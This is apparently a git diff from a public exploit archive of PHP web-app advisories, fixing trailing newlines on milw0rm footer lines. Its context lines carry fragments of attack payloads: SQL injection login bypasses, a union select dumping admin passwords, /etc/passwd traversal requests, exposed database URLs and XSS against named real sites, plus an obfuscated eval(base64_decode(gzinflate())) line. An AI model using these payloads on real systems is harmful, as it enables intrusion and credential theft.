milw0rm.com [2008-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/6413.txt b/platforms/php/webapps/6413.txt index 8d41d2bce..893ca1ac0 100755 --- a/platforms/php/webapps/6413.txt +++ b/platforms/php/webapps/6413.txt @@ -28,4 +28,4 @@ ############################################################################################################ -# milw0rm.com [2008-09-10] +# milw0rm.com [2008-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/6416.txt b/platforms/php/webapps/6416.txt index c7b2ceae5..b1a4f368f 100755 --- a/platforms/php/webapps/6416.txt +++ b/platforms/php/webapps/6416.txt @@ -56,4 +56,4 @@ return exit; } -# milw0rm.com [2008-09-10] +# milw0rm.com [2008-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/6417.txt b/platforms/php/webapps/6417.txt index d06238e2b..de33449bb 100755 --- a/platforms/php/webapps/6417.txt +++ b/platforms/php/webapps/6417.txt @@ -59,4 +59,4 @@ <<->> All muslims -# milw0rm.com [2008-09-10] +# milw0rm.com [2008-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/6419.txt b/platforms/php/webapps/6419.txt index f7f4bac53..27d74c2aa 100755 --- a/platforms/php/webapps/6419.txt +++ b/platforms/php/webapps/6419.txt @@ -39,4 +39,4 @@ exit; ############################################################## ############################################################## -# milw0rm.com [2008-09-10] +# milw0rm.com [2008-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/6421.php b/platforms/php/webapps/6421.php index d50495b76..038b84ed2 100755 --- a/platforms/php/webapps/6421.php +++ b/platforms/php/webapps/6421.php @@ -152,4 +152,4 @@ ?> -# milw0rm.com [2008-09-10] +# milw0rm.com [2008-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/6422.txt b/platforms/php/webapps/6422.txt index ec54d2064..6d3d9b7bd 100755 --- a/platforms/php/webapps/6422.txt +++ b/platforms/php/webapps/6422.txt @@ -59,4 +59,4 @@ # Bug discovered : 10 Sep.2008 ########################################################### -# milw0rm.com [2008-09-10] +# milw0rm.com [2008-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/6423.txt b/platforms/php/webapps/6423.txt index 2e2050169..e9eceb583 100755 --- a/platforms/php/webapps/6423.txt +++ b/platforms/php/webapps/6423.txt @@ -40,4 +40,4 @@ WebSite: WwW.DeltaHacking.Net & WwW.w3bsecurity.iR Contact: Cru3l.b0y[at]gmail.com -# milw0rm.com [2008-09-10] +# milw0rm.com [2008-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/6425.txt b/platforms/php/webapps/6425.txt index 49ffd6bd4..5597a8f81 100755 --- a/platforms/php/webapps/6425.txt +++ b/platforms/php/webapps/6425.txt @@ -48,4 +48,4 @@ Xss 2 : http://example/admin/include/isadmin.inc.php?lang[ident_title]= [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2008-11-14] +# milw0rm.com [2008-11-14] \ No newline at end of file diff --git a/platforms/php/webapps/7118.txt b/platforms/php/webapps/7118.txt index 5cdaecfd1..62ce30ae5 100755 --- a/platforms/php/webapps/7118.txt +++ b/platforms/php/webapps/7118.txt @@ -51,4 +51,4 @@ exit(); =============================================================================== -# milw0rm.com [2008-11-14] +# milw0rm.com [2008-11-14] \ No newline at end of file diff --git a/platforms/php/webapps/7119.php b/platforms/php/webapps/7119.php index 0ac5d72fd..794ba710b 100755 --- a/platforms/php/webapps/7119.php +++ b/platforms/php/webapps/7119.php @@ -65,4 +65,4 @@ function send() ?> -# milw0rm.com [2008-11-14] +# milw0rm.com [2008-11-14] \ No newline at end of file diff --git a/platforms/php/webapps/7121.pl b/platforms/php/webapps/7121.pl index 17e721a05..aa4bc491d 100755 --- a/platforms/php/webapps/7121.pl +++ b/platforms/php/webapps/7121.pl @@ -115,4 +115,4 @@ sub search_MD5 __END__ -# milw0rm.com [2008-11-14] +# milw0rm.com [2008-11-14] \ No newline at end of file diff --git a/platforms/php/webapps/7122.txt b/platforms/php/webapps/7122.txt index 7f71bc039..8000e3688 100755 --- a/platforms/php/webapps/7122.txt +++ b/platforms/php/webapps/7122.txt @@ -56,4 +56,4 @@ all freinds , muslim , and stroke .... and for the kids who send the message :) u just kide -# milw0rm.com [2008-11-14] +# milw0rm.com [2008-11-14] \ No newline at end of file diff --git a/platforms/php/webapps/7123.txt b/platforms/php/webapps/7123.txt index 6cd576ff7..18a567d02 100755 --- a/platforms/php/webapps/7123.txt +++ b/platforms/php/webapps/7123.txt @@ -40,4 +40,4 @@ password: ' or ' 1=1-- [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2008-11-14] +# milw0rm.com [2008-11-14] \ No newline at end of file diff --git a/platforms/php/webapps/7124.txt b/platforms/php/webapps/7124.txt index 9baae5976..4f114f524 100755 --- a/platforms/php/webapps/7124.txt +++ b/platforms/php/webapps/7124.txt @@ -44,4 +44,4 @@ http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id="> [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2008-11-24] +# milw0rm.com [2008-11-24] \ No newline at end of file diff --git a/platforms/php/webapps/7216.txt b/platforms/php/webapps/7216.txt index ea3a825ba..f32bd799d 100755 --- a/platforms/php/webapps/7216.txt +++ b/platforms/php/webapps/7216.txt @@ -109,4 +109,4 @@ www.astalavista.com www.astalavista.net -# milw0rm.com [2008-11-24] +# milw0rm.com [2008-11-24] \ No newline at end of file diff --git a/platforms/php/webapps/7217.pl b/platforms/php/webapps/7217.pl index 18c316386..fff8547d7 100755 --- a/platforms/php/webapps/7217.pl +++ b/platforms/php/webapps/7217.pl @@ -255,4 +255,4 @@ sub banner "[+] Coded by __GiReX__\n\n"; } -# milw0rm.com [2008-11-24] +# milw0rm.com [2008-11-24] \ No newline at end of file diff --git a/platforms/php/webapps/7218.txt b/platforms/php/webapps/7218.txt index be3463fcf..670985c64 100755 --- a/platforms/php/webapps/7218.txt +++ b/platforms/php/webapps/7218.txt @@ -54,4 +54,4 @@ As we can see, The 'id' variable comes directly from get. So we can inject our h #### -# milw0rm.com [2008-11-24] +# milw0rm.com [2008-11-24] \ No newline at end of file diff --git a/platforms/php/webapps/7221.txt b/platforms/php/webapps/7221.txt index aba063d67..898347ff5 100755 --- a/platforms/php/webapps/7221.txt +++ b/platforms/php/webapps/7221.txt @@ -109,4 +109,4 @@ =========================================================================================== -# milw0rm.com [2008-11-24] +# milw0rm.com [2008-11-24] \ No newline at end of file diff --git a/platforms/php/webapps/7222.txt b/platforms/php/webapps/7222.txt index 7a023f2c4..76d8a57b7 100755 --- a/platforms/php/webapps/7222.txt +++ b/platforms/php/webapps/7222.txt @@ -43,4 +43,4 @@ ____________________________( Greetz )_________________________________ Im IRAQi | Im TrYaGi -# milw0rm.com [2008-11-25] +# milw0rm.com [2008-11-25] \ No newline at end of file diff --git a/platforms/php/webapps/7223.txt b/platforms/php/webapps/7223.txt index e118b5243..68269512c 100755 --- a/platforms/php/webapps/7223.txt +++ b/platforms/php/webapps/7223.txt @@ -43,4 +43,4 @@ ____________________________( Greetz )_________________________________ Im IRAQi | Im TrYaGi -# milw0rm.com [2008-11-25] +# milw0rm.com [2008-11-25] \ No newline at end of file diff --git a/platforms/php/webapps/7224.txt b/platforms/php/webapps/7224.txt index dd8f56a5e..7aa91f014 100755 --- a/platforms/php/webapps/7224.txt +++ b/platforms/php/webapps/7224.txt @@ -44,4 +44,4 @@ http://www.4yoursite.nl/demo/faq_manager/catagorie.php?cat_id=3+union+select+1,2,concat_ws(0x3a,admin_name,admin_pass),4,5+from+faq_admin/* -# milw0rm.com [2008-11-25] +# milw0rm.com [2008-11-25] \ No newline at end of file diff --git a/platforms/php/webapps/7225.txt b/platforms/php/webapps/7225.txt index 29dea1985..ee73e7f0a 100755 --- a/platforms/php/webapps/7225.txt +++ b/platforms/php/webapps/7225.txt @@ -33,4 +33,4 @@ http://localhost/script/[pie installation]/lib/action/rss.php?lib=ZoRLu.txt? [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2008-11-25] +# milw0rm.com [2008-11-25] \ No newline at end of file diff --git a/platforms/php/webapps/7227.txt b/platforms/php/webapps/7227.txt index ea98d534a..de9663e48 100755 --- a/platforms/php/webapps/7227.txt +++ b/platforms/php/webapps/7227.txt @@ -45,4 +45,4 @@ http://www.arcade-classics.net/top100/index.php?start="> [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2008-11-25] +# milw0rm.com [2008-11-25] \ No newline at end of file diff --git a/platforms/php/webapps/7228.txt b/platforms/php/webapps/7228.txt index 8effbff48..f0329451e 100755 --- a/platforms/php/webapps/7228.txt +++ b/platforms/php/webapps/7228.txt @@ -30,4 +30,4 @@ http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=">{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ; } -# milw0rm.com [2008-11-25] +# milw0rm.com [2008-11-25] \ No newline at end of file diff --git a/platforms/php/webapps/7231.txt b/platforms/php/webapps/7231.txt index b65efeadc..f0951427c 100755 --- a/platforms/php/webapps/7231.txt +++ b/platforms/php/webapps/7231.txt @@ -35,4 +35,4 @@ and push reply //Alfons Luja 25.12.2008 -# milw0rm.com [2008-11-25] +# milw0rm.com [2008-11-25] \ No newline at end of file diff --git a/platforms/php/webapps/7232.txt b/platforms/php/webapps/7232.txt index a2207b428..feb9fa8a5 100755 --- a/platforms/php/webapps/7232.txt +++ b/platforms/php/webapps/7232.txt @@ -40,4 +40,4 @@ http://www.bvrg.org.uk/simpleblog3/admin/default.asp [»] [»] ---------------------------------------------------------------------- -# milw0rm.com [2008-11-25] +# milw0rm.com [2008-11-25] \ No newline at end of file diff --git a/platforms/php/webapps/7233.txt b/platforms/php/webapps/7233.txt index 708fbf7c7..0d951b7ca 100755 --- a/platforms/php/webapps/7233.txt +++ b/platforms/php/webapps/7233.txt @@ -45,4 +45,4 @@ ?> -# milw0rm.com [2008-11-25] +# milw0rm.com [2008-11-25] \ No newline at end of file diff --git a/platforms/php/webapps/7234.txt b/platforms/php/webapps/7234.txt index 723212efa..dc3393b13 100755 --- a/platforms/php/webapps/7234.txt +++ b/platforms/php/webapps/7234.txt @@ -58,4 +58,4 @@ Spicail ( R07 T9awwad ) To str0ke & Milw0rM = [AttaCk Is CompLet] = ___________________________________________________________________________________________________________________________________________________________ -# milw0rm.com [2008-11-25] +# milw0rm.com [2008-11-25] \ No newline at end of file diff --git a/platforms/php/webapps/7235.txt b/platforms/php/webapps/7235.txt index d61fa94e4..5039f0f5a 100755 --- a/platforms/php/webapps/7235.txt +++ b/platforms/php/webapps/7235.txt @@ -30,4 +30,4 @@ \> Str0ke Thc(MarJuana) WiLLiam S. Burroughs LiLiTh (You Ar& Mi!nE!) Spud Loooo Z00ooo00oo0 alert('Bl@ckbe@rD is not dead yet')[Peace xD ] -# milw0rm.com [2008-11-27] +# milw0rm.com [2008-11-27] \ No newline at end of file diff --git a/platforms/php/webapps/7243.php b/platforms/php/webapps/7243.php index 315b2fe2b..12f5ba189 100755 --- a/platforms/php/webapps/7243.php +++ b/platforms/php/webapps/7243.php @@ -57,4 +57,4 @@ echo "\nExploiting failed: By Stack\n"; } ?> -# milw0rm.com [2008-11-27] +# milw0rm.com [2008-11-27] \ No newline at end of file diff --git a/platforms/php/webapps/7244.txt b/platforms/php/webapps/7244.txt index be1745de4..af6e1f93c 100755 --- a/platforms/php/webapps/7244.txt +++ b/platforms/php/webapps/7244.txt @@ -20,4 +20,4 @@ http://site.com/path/?DisplayFormat=>">&Action=Po Victem : http://ocean12tech.com/products/contact/demo -# milw0rm.com [2008-11-27] +# milw0rm.com [2008-11-27] \ No newline at end of file diff --git a/platforms/php/webapps/7245.txt b/platforms/php/webapps/7245.txt index 2d9d97bc5..1479dda0c 100755 --- a/platforms/php/webapps/7245.txt +++ b/platforms/php/webapps/7245.txt @@ -12,4 +12,4 @@ http://ocean12tech.com/path/o12member.mdb Victem : http://ocean12tech.com/products/membership/demo -# milw0rm.com [2008-11-27] +# milw0rm.com [2008-11-27] \ No newline at end of file diff --git a/platforms/php/webapps/7246.txt b/platforms/php/webapps/7246.txt index 5adaef87d..b63b5a4a8 100755 --- a/platforms/php/webapps/7246.txt +++ b/platforms/php/webapps/7246.txt @@ -14,4 +14,4 @@ http://site.com/path/o12poll.mdb Victem : http://ocean12tech.com/products/poll/demo -# milw0rm.com [2008-11-27] +# milw0rm.com [2008-11-27] \ No newline at end of file diff --git a/platforms/php/webapps/7247.txt b/platforms/php/webapps/7247.txt index f8a7c5c8f..a6ea3a770 100755 --- a/platforms/php/webapps/7247.txt +++ b/platforms/php/webapps/7247.txt @@ -14,4 +14,4 @@ http://site.com/path/o12cal.mdb Victem : http://ocean12tech.com/products/o12calgold/demo -# milw0rm.com [2008-11-27] +# milw0rm.com [2008-11-27] \ No newline at end of file diff --git a/platforms/php/webapps/7248.txt b/platforms/php/webapps/7248.txt index 4d4cad88d..43ef312b7 100755 --- a/platforms/php/webapps/7248.txt +++ b/platforms/php/webapps/7248.txt @@ -23,4 +23,4 @@ str0ke , Bayhay , Cyber-Zone , Mor0ccan nightamres ----------------------------------------------------------------------------------- -# milw0rm.com [2008-11-27] +# milw0rm.com [2008-11-27] \ No newline at end of file diff --git a/platforms/php/webapps/725.pl b/platforms/php/webapps/725.pl index d4f1c4dda..ef1da341e 100755 --- a/platforms/php/webapps/725.pl +++ b/platforms/php/webapps/725.pl @@ -219,4 +219,4 @@ $tipo=get($hot[$q]) or next; } } -# milw0rm.com [2004-12-25] +# milw0rm.com [2004-12-25] \ No newline at end of file diff --git a/platforms/php/webapps/7250.txt b/platforms/php/webapps/7250.txt index 6cb135da9..2d47ac794 100755 --- a/platforms/php/webapps/7250.txt +++ b/platforms/php/webapps/7250.txt @@ -28,4 +28,4 @@ \> str0ke OnlY me ( no help for this ) ;-) ); } -# milw0rm.com [2008-11-30] +# milw0rm.com [2008-11-30] \ No newline at end of file diff --git a/platforms/php/webapps/7305.txt b/platforms/php/webapps/7305.txt index 7ad1a26b4..df20a8780 100755 --- a/platforms/php/webapps/7305.txt +++ b/platforms/php/webapps/7305.txt @@ -62,4 +62,4 @@ Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, Gnu Special Thx : asylu3, str0ke, citec.us, milw0rm.com ####################################################################################### -# milw0rm.com [2008-11-30] +# milw0rm.com [2008-11-30] \ No newline at end of file diff --git a/platforms/php/webapps/7306.txt b/platforms/php/webapps/7306.txt index f58f04785..fac56d5ff 100755 --- a/platforms/php/webapps/7306.txt +++ b/platforms/php/webapps/7306.txt @@ -53,4 +53,4 @@ =========================================================================================================== -# milw0rm.com [2008-11-30] +# milw0rm.com [2008-11-30] \ No newline at end of file diff --git a/platforms/php/webapps/7308.txt b/platforms/php/webapps/7308.txt index 4ae6d0f3c..617d63c65 100755 --- a/platforms/php/webapps/7308.txt +++ b/platforms/php/webapps/7308.txt @@ -178,4 +178,4 @@ ------------------------------------------------------------------------------------------------- -# milw0rm.com [2008-11-30] +# milw0rm.com [2008-11-30] \ No newline at end of file diff --git a/platforms/php/webapps/7310.txt b/platforms/php/webapps/7310.txt index 54a1a0f72..d1930a803 100755 --- a/platforms/php/webapps/7310.txt +++ b/platforms/php/webapps/7310.txt @@ -59,4 +59,4 @@ ================================================================================================================= -# milw0rm.com [2008-11-30] +# milw0rm.com [2008-11-30] \ No newline at end of file diff --git a/platforms/php/webapps/7311.txt b/platforms/php/webapps/7311.txt index 13c6abeac..7b0dc5cd7 100755 --- a/platforms/php/webapps/7311.txt +++ b/platforms/php/webapps/7311.txt @@ -36,4 +36,4 @@ Raha nayda Nood :)Fuck Bigg Kbir Lkarcha Bo ta7cha stoon dyalibou7do hwa cha7ta ++ [!] Fi Khater Mgharba wahed wahed , Kima tayGol Khoya cyber-zone , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!] ++ +--------------------------------------------------------------------------------------------------------------------------------------------------------++ -# milw0rm.com [2008-12-01] +# milw0rm.com [2008-12-01] \ No newline at end of file diff --git a/platforms/php/webapps/7312.txt b/platforms/php/webapps/7312.txt index c860247d4..62b537884 100755 --- a/platforms/php/webapps/7312.txt +++ b/platforms/php/webapps/7312.txt @@ -112,4 +112,4 @@ Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, Gnu Special Thx : asylu3, str0ke, citec.us, milw0rm.com ####################################################################################### -# milw0rm.com [2008-12-01] +# milw0rm.com [2008-12-01] \ No newline at end of file diff --git a/platforms/php/webapps/7315.txt b/platforms/php/webapps/7315.txt index 290c2ae26..373e6c46d 100755 --- a/platforms/php/webapps/7315.txt +++ b/platforms/php/webapps/7315.txt @@ -17,4 +17,4 @@ Password : 'or' '=' Add, modify user : /admin/admin-users.asp -# milw0rm.com [2008-12-01] +# milw0rm.com [2008-12-01] \ No newline at end of file diff --git a/platforms/php/webapps/7317.pl b/platforms/php/webapps/7317.pl index 0a94f01d3..b3d8dbf81 100755 --- a/platforms/php/webapps/7317.pl +++ b/platforms/php/webapps/7317.pl @@ -92,4 +92,4 @@ else { } } -# milw0rm.com [2008-12-01] +# milw0rm.com [2008-12-01] \ No newline at end of file diff --git a/platforms/php/webapps/7318.txt b/platforms/php/webapps/7318.txt index 8c26b0cb4..a7b07bc7a 100755 --- a/platforms/php/webapps/7318.txt +++ b/platforms/php/webapps/7318.txt @@ -43,4 +43,4 @@ http://pacosdrivers.com/asp/poll/poll.mdb ########################################################################### -# milw0rm.com [2008-12-01] +# milw0rm.com [2008-12-01] \ No newline at end of file diff --git a/platforms/php/webapps/7319.txt b/platforms/php/webapps/7319.txt index 600802986..bdfe3b3da 100755 --- a/platforms/php/webapps/7319.txt +++ b/platforms/php/webapps/7319.txt @@ -18,4 +18,4 @@ http://site.com/[Path]/default.asp?Error=Pouya_Server&Name=&Email=Pouya.s3rver@g Victem : http://ocean12tech.com/products/o12mailgold/demo -# milw0rm.com [2008-12-02] +# milw0rm.com [2008-12-02] \ No newline at end of file diff --git a/platforms/php/webapps/7322.pl b/platforms/php/webapps/7322.pl index aa2aaf840..81058a765 100755 --- a/platforms/php/webapps/7322.pl +++ b/platforms/php/webapps/7322.pl @@ -115,4 +115,4 @@ while ($cmd ne "exit") { } -# milw0rm.com [2008-12-02] +# milw0rm.com [2008-12-02] \ No newline at end of file diff --git a/platforms/php/webapps/7323.txt b/platforms/php/webapps/7323.txt index 0606fdf2e..4f95dd056 100755 --- a/platforms/php/webapps/7323.txt +++ b/platforms/php/webapps/7323.txt @@ -41,4 +41,4 @@ # #=========================================================== -# milw0rm.com [2008-12-02] +# milw0rm.com [2008-12-02] \ No newline at end of file diff --git a/platforms/php/webapps/7324.txt b/platforms/php/webapps/7324.txt index 02545a604..39c421d13 100755 --- a/platforms/php/webapps/7324.txt +++ b/platforms/php/webapps/7324.txt @@ -19,4 +19,4 @@ http://localhost/[PATH]/db/cldb.mdb --------------------------------------------------------------------------- -# milw0rm.com [2008-12-02] +# milw0rm.com [2008-12-02] \ No newline at end of file diff --git a/platforms/php/webapps/7328.pl b/platforms/php/webapps/7328.pl index aa8f5fb15..6b9332b8a 100755 --- a/platforms/php/webapps/7328.pl +++ b/platforms/php/webapps/7328.pl @@ -93,4 +93,4 @@ else { } } -# milw0rm.com [2008-12-03] +# milw0rm.com [2008-12-03] \ No newline at end of file diff --git a/platforms/php/webapps/7331.pl b/platforms/php/webapps/7331.pl index 68c937cb8..4fb2e7340 100755 --- a/platforms/php/webapps/7331.pl +++ b/platforms/php/webapps/7331.pl @@ -62,4 +62,4 @@ sub help exit; } -# milw0rm.com [2008-12-03] +# milw0rm.com [2008-12-03] \ No newline at end of file diff --git a/platforms/php/webapps/7332.txt b/platforms/php/webapps/7332.txt index 06111fef7..d4500690e 100755 --- a/platforms/php/webapps/7332.txt +++ b/platforms/php/webapps/7332.txt @@ -32,4 +32,4 @@ http://target.com/users.mdb ########################################################################### -# milw0rm.com [2008-12-03] +# milw0rm.com [2008-12-03] \ No newline at end of file diff --git a/platforms/php/webapps/7333.txt b/platforms/php/webapps/7333.txt index 5f7e3e370..3368a448d 100755 --- a/platforms/php/webapps/7333.txt +++ b/platforms/php/webapps/7333.txt @@ -52,4 +52,4 @@ DEMO : http://www.aliensoftcorp.com/contactmanager.htm ########################################################################################################## -# milw0rm.com [2008-12-03] +# milw0rm.com [2008-12-03] \ No newline at end of file diff --git a/platforms/php/webapps/7335.txt b/platforms/php/webapps/7335.txt index 5cc0a5da9..890c6c642 100755 --- a/platforms/php/webapps/7335.txt +++ b/platforms/php/webapps/7335.txt @@ -47,4 +47,4 @@ ========================================================================== -# milw0rm.com [2008-12-03] +# milw0rm.com [2008-12-03] \ No newline at end of file diff --git a/platforms/php/webapps/7336.txt b/platforms/php/webapps/7336.txt index ec57053d4..e63843e42 100755 --- a/platforms/php/webapps/7336.txt +++ b/platforms/php/webapps/7336.txt @@ -92,4 +92,4 @@ EoF. -# milw0rm.com [2008-12-04] +# milw0rm.com [2008-12-04] \ No newline at end of file diff --git a/platforms/php/webapps/7337.txt b/platforms/php/webapps/7337.txt index 69444ed92..135881fc1 100755 --- a/platforms/php/webapps/7337.txt +++ b/platforms/php/webapps/7337.txt @@ -63,4 +63,4 @@ $row=mysql_fetch_array($rs); Special Thx : asylu3, str0ke, citec.us, milw0rm.com ##################################################################### -# milw0rm.com [2008-12-04] +# milw0rm.com [2008-12-04] \ No newline at end of file diff --git a/platforms/php/webapps/7338.txt b/platforms/php/webapps/7338.txt index 41d641952..2498e82a1 100755 --- a/platforms/php/webapps/7338.txt +++ b/platforms/php/webapps/7338.txt @@ -32,4 +32,4 @@ http://target.com/users.mdb ########################################################################### -# milw0rm.com [2008-12-04] +# milw0rm.com [2008-12-04] \ No newline at end of file diff --git a/platforms/php/webapps/7339.txt b/platforms/php/webapps/7339.txt index 31e17b367..410720260 100755 --- a/platforms/php/webapps/7339.txt +++ b/platforms/php/webapps/7339.txt @@ -26,4 +26,4 @@ pass: http://demo.merlix.com/templatecreature/media/media_level.asp?mcatid=99999 [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2008-12-04] +# milw0rm.com [2008-12-04] \ No newline at end of file diff --git a/platforms/php/webapps/7341.txt b/platforms/php/webapps/7341.txt index 02e090747..f90af8ecc 100755 --- a/platforms/php/webapps/7341.txt +++ b/platforms/php/webapps/7341.txt @@ -50,4 +50,4 @@ ============================================================================================================= -# milw0rm.com [2008-12-04] +# milw0rm.com [2008-12-04] \ No newline at end of file diff --git a/platforms/php/webapps/7342.txt b/platforms/php/webapps/7342.txt index 336655def..34bd0af50 100755 --- a/platforms/php/webapps/7342.txt +++ b/platforms/php/webapps/7342.txt @@ -26,4 +26,4 @@ Proof of concept: http://[host]/[my_simple_forum_path]/index.php?action=../../../../../../../etc/passwd%00 http://[host]/[my_simple_forum_path]/index.php?action=../../../../[localfile]%00 -# milw0rm.com [2008-12-04] +# milw0rm.com [2008-12-04] \ No newline at end of file diff --git a/platforms/php/webapps/7343.txt b/platforms/php/webapps/7343.txt index 4792329a1..7a3b0c0fd 100755 --- a/platforms/php/webapps/7343.txt +++ b/platforms/php/webapps/7343.txt @@ -21,4 +21,4 @@ # Site : Http://IRCRASH.COM # ###################################### TNX GOD ###################################### -# milw0rm.com [2008-12-04] +# milw0rm.com [2008-12-04] \ No newline at end of file diff --git a/platforms/php/webapps/7344.txt b/platforms/php/webapps/7344.txt index 63a3af45f..d994d98d8 100755 --- a/platforms/php/webapps/7344.txt +++ b/platforms/php/webapps/7344.txt @@ -38,4 +38,4 @@ ******************************************************************************************* -# milw0rm.com [2008-12-04] +# milw0rm.com [2008-12-04] \ No newline at end of file diff --git a/platforms/php/webapps/7345.txt b/platforms/php/webapps/7345.txt index 1eeb9e186..bb641ed76 100755 --- a/platforms/php/webapps/7345.txt +++ b/platforms/php/webapps/7345.txt @@ -66,4 +66,4 @@ ******************************************************************************************* -# milw0rm.com [2008-12-04] +# milw0rm.com [2008-12-04] \ No newline at end of file diff --git a/platforms/php/webapps/7346.txt b/platforms/php/webapps/7346.txt index 5bc981855..d47bfdd96 100755 --- a/platforms/php/webapps/7346.txt +++ b/platforms/php/webapps/7346.txt @@ -35,4 +35,4 @@ Login : http://www.site.com/admin Gaza Hacker TeaM : Le0n & Lito & cLAw & zero cod ####################################################################################### -# milw0rm.com [2008-12-05] +# milw0rm.com [2008-12-05] \ No newline at end of file diff --git a/platforms/php/webapps/7351.txt b/platforms/php/webapps/7351.txt index e40bc3986..19948dd49 100755 --- a/platforms/php/webapps/7351.txt +++ b/platforms/php/webapps/7351.txt @@ -33,4 +33,4 @@ http://target.com/db/users-zza21.mdb ########################################################################### -# milw0rm.com [2008-12-05] +# milw0rm.com [2008-12-05] \ No newline at end of file diff --git a/platforms/php/webapps/7352.txt b/platforms/php/webapps/7352.txt index 22dcf395c..dfee45310 100755 --- a/platforms/php/webapps/7352.txt +++ b/platforms/php/webapps/7352.txt @@ -28,4 +28,4 @@ passwd: ' or ' [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2008-12-05] +# milw0rm.com [2008-12-05] \ No newline at end of file diff --git a/platforms/php/webapps/7354.txt b/platforms/php/webapps/7354.txt index 38f5fb86f..3884aa0be 100755 --- a/platforms/php/webapps/7354.txt +++ b/platforms/php/webapps/7354.txt @@ -19,4 +19,4 @@ my mail: kivi_hacker666@yahoo.com *************************************************** -# milw0rm.com [2008-12-05] +# milw0rm.com [2008-12-05] \ No newline at end of file diff --git a/platforms/php/webapps/7363.txt b/platforms/php/webapps/7363.txt index 4a5c40e6d..10ae1f127 100755 --- a/platforms/php/webapps/7363.txt +++ b/platforms/php/webapps/7363.txt @@ -81,4 +81,4 @@ ******************************************************************************************* -# milw0rm.com [2008-12-06] +# milw0rm.com [2008-12-06] \ No newline at end of file diff --git a/platforms/php/webapps/7364.php b/platforms/php/webapps/7364.php index 0961e77ad..a7b69043f 100755 --- a/platforms/php/webapps/7364.php +++ b/platforms/php/webapps/7364.php @@ -102,4 +102,4 @@ error_reporting(E_ALL); eval(base64_decode(gzinflate(base64_decode($G4N0K)))); ?> -# milw0rm.com [2008-12-07] +# milw0rm.com [2008-12-07] \ No newline at end of file diff --git a/platforms/php/webapps/7365.php b/platforms/php/webapps/7365.php index 726ffe4ac..7f21e40fd 100755 --- a/platforms/php/webapps/7365.php +++ b/platforms/php/webapps/7365.php @@ -103,4 +103,4 @@ error_reporting(E_ALL); ?> -# milw0rm.com [2008-12-07] +# milw0rm.com [2008-12-07] \ No newline at end of file diff --git a/platforms/php/webapps/7366.php b/platforms/php/webapps/7366.php index ec560ab90..b032da3ec 100755 --- a/platforms/php/webapps/7366.php +++ b/platforms/php/webapps/7366.php @@ -102,4 +102,4 @@ error_reporting(E_ALL); eval(base64_decode(gzinflate(base64_decode($G4N0K)))); ?> -# milw0rm.com [2008-12-07] +# milw0rm.com [2008-12-07] \ No newline at end of file diff --git a/platforms/php/webapps/7367.php b/platforms/php/webapps/7367.php index a1be0d757..da5e50536 100755 --- a/platforms/php/webapps/7367.php +++ b/platforms/php/webapps/7367.php @@ -101,4 +101,4 @@ error_reporting(E_ALL); eval(base64_decode(gzinflate(base64_decode($G4N0K)))); ?> -# milw0rm.com [2008-12-07] +# milw0rm.com [2008-12-07] \ No newline at end of file diff --git a/platforms/php/webapps/7368.txt b/platforms/php/webapps/7368.txt index efafd2f15..6fe16f97d 100755 --- a/platforms/php/webapps/7368.txt +++ b/platforms/php/webapps/7368.txt @@ -49,4 +49,4 @@ DEMO (links) : http://www.productsaleframework.com ########################################################################################################## -# milw0rm.com [2008-12-07] +# milw0rm.com [2008-12-07] \ No newline at end of file diff --git a/platforms/php/webapps/7369.pl b/platforms/php/webapps/7369.pl index 9fe5dc40f..d60cbf3da 100755 --- a/platforms/php/webapps/7369.pl +++ b/platforms/php/webapps/7369.pl @@ -161,4 +161,4 @@ sub use_bug } } -# milw0rm.com [2008-12-07] +# milw0rm.com [2008-12-07] \ No newline at end of file diff --git a/platforms/php/webapps/737.txt b/platforms/php/webapps/737.txt index f79f5e792..61df4ae3b 100755 --- a/platforms/php/webapps/737.txt +++ b/platforms/php/webapps/737.txt @@ -1,4 +1,4 @@ REQUEST: http://[SERVER]/qwiki/index.php?page=../_config.php%00 -# milw0rm.com [2005-01-04] +# milw0rm.com [2005-01-04] \ No newline at end of file diff --git a/platforms/php/webapps/7374.txt b/platforms/php/webapps/7374.txt index bdbd9553c..fd1407fce 100755 --- a/platforms/php/webapps/7374.txt +++ b/platforms/php/webapps/7374.txt @@ -44,4 +44,4 @@ Proof of Concept EoF -# milw0rm.com [2008-12-07] +# milw0rm.com [2008-12-07] \ No newline at end of file diff --git a/platforms/php/webapps/7375.txt b/platforms/php/webapps/7375.txt index 5c69c46e2..04b2bc1f2 100755 --- a/platforms/php/webapps/7375.txt +++ b/platforms/php/webapps/7375.txt @@ -40,4 +40,4 @@ Maybe double fail ? x] EoF -# milw0rm.com [2008-12-07] +# milw0rm.com [2008-12-07] \ No newline at end of file diff --git a/platforms/php/webapps/7377.txt b/platforms/php/webapps/7377.txt index 19c151c9c..45f0d95d2 100755 --- a/platforms/php/webapps/7377.txt +++ b/platforms/php/webapps/7377.txt @@ -18,4 +18,4 @@ Exploit : http://site/phpmygallery/index.php?group=../somefolder [+] Important : This vulnerability is Discovered By Yee7-Team, By [ zAx ] and [ ShockShadow ] -# milw0rm.com [2008-12-07] +# milw0rm.com [2008-12-07] \ No newline at end of file diff --git a/platforms/php/webapps/7379.txt b/platforms/php/webapps/7379.txt index 6e6fae5ef..f60602a23 100755 --- a/platforms/php/webapps/7379.txt +++ b/platforms/php/webapps/7379.txt @@ -70,4 +70,4 @@ // ALFONS LUJA just 4 fUn :P ?> -# milw0rm.com [2008-12-08] +# milw0rm.com 